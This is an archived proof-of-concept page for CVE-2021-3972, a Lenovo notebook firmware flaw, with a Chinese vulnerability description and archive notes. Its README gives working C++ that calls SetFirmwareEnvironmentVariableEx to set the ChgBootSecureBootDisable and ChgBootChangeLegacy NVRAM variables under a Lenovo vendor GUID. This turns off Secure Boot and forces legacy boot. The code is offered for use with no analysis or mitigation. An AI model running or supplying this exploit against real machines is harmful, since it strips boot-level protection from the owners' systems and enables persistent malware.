关联漏洞
标题:Lenovo Notebook 安全漏洞 (CVE-2021-3972)Description:Lenovo Notebook是中国联想(Lenovo)公司的联想的一款笔记本电脑。 Lenovo Notebook 存在安全漏洞,该漏洞源于使用错误驱动程序,并且错误地未停用。本地特权用户可以通过修改 NVRAM 变量来修改安全启动设置并绕过实施的安全限制。该漏洞允许本地用户提升系统的权限。
Description
just poc
介绍
# CVE-2021-3972
poc code without other thing
```c++
BYTE value = 0x1;
SetFirmwareEnvironmentVariableEx(_T("ChgBootSecureBootDisable"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);
SetFirmwareEnvironmentVariableEx(_T("ChgBootChangeLegacy"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);
```
文件快照
[4.0K] /data/pocs/abc7977d743a33cdcf0d78475c39afa23c87eaff
└── [ 341] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。